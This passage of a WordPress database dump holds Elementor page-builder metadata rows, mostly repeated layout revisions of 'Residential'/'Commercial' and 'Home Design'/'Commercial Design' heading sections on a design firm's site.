:[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2741,4708,'_elementor_page_assets','a:0:{}'),(2742,4708,'_elementor_pro_version','3.8.1'),(2743,4708,'_elementor_css','a:6:{s:4:\"time\";i:1668400328;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2744,4709,'_wp_page_template','elementor_header_footer'),(2745,4709,'_elementor_edit_mode','builder'),(2746,4709,'_elementor_template_type','wp-page'),(2747,4709,'_elementor_version','3.8.1'),(2748,4709,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2749,4709,'_elementor_page_assets','a:0:{}'),(2750,4709,'_elementor_pro_version','3.8.1'),(2751,4709,'_elementor_css','a:6:{s:4:\"time\";i:1668400328;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2752,4710,'_wp_page_template','elementor_header_footer'),(2753,4710,'_elementor_edit_mode','builder'),(2754,4710,'_elementor_template_type','wp-page'),(2755,4710,'_elementor_version','3.8.1'),(2756,4710,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding projects\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Residential\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2757,4710,'_elementor_page_assets','a:0:{}'),(2758,4710,'_elementor_pro_version','3.8.1'),(2759,4710,'_elementor_css','a:6:{s:4:\"time\";i:1668400328;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2760,4711,'_wp_page_template','elementor_header_footer'),(2761,4711,'_elementor_edit_mode','builder'),(2762,4711,'_elementor_template_type','wp-page'),(2763,4711,'_elementor_version','3.8.1'),(2764,4711,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding Services\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Home Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2765,4711,'_elementor_page_assets','a:0:{}'),(2766,4711,'_elementor_pro_version','3.8.1'),(2767,4711,'_elementor_css','a:6:{s:4:\"time\";i:1668400328;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:2:{i:0;s:7:\"f248593\";i:1;s:7:\"bb90e9f\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(2768,4712,'_wp_page_template','elementor_header_footer'),(2769,4712,'_elementor_edit_mode','builder'),(2770,4712,'_elementor_template_type','wp-page'),(2771,4712,'_elementor_version','3.8.1'),(2772,4712,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding Services\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Home Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2773,4712,'_elementor_page_assets','a:0:{}'),(2774,4712,'_elementor_pro_version','3.8.1'),(2775,4713,'_wp_page_template','elementor_header_footer'),(2776,4713,'_elementor_edit_mode','builder'),(2777,4713,'_elementor_template_type','wp-page'),(2778,4713,'_elementor_version','3.8.1'),(2779,4713,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding Services\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Home Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/commercial\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"bb90e9f\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"9b229ae\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%224681%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2780,4713,'_elementor_page_assets','a:0:{}'),(2781,4713,'_elementor_pro_version','3.8.1'),(2782,4714,'_wp_page_template','elementor_header_footer'),(2783,4714,'_elementor_edit_mode','builder'),(2784,4714,'_elementor_template_type','wp-page'),(2785,4714,'_elementor_version','3.8.1'),(2786,4714,'_elementor_data','[{\"id\":\"f600624\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"10\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67237bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"145e250\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\" Introducing outstanding Services\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c79d088\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8ac30c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8b846e8\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Home Design\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"link_address\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/residential\\/\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f248593\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"5c62f62\\\" name=\\\"internal-url\\\" settings=\\\"%7B%22type%22%3A%22post%22%2C%22post_id%22%3A%22560%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"28621e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4e8bbb1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"Commercial 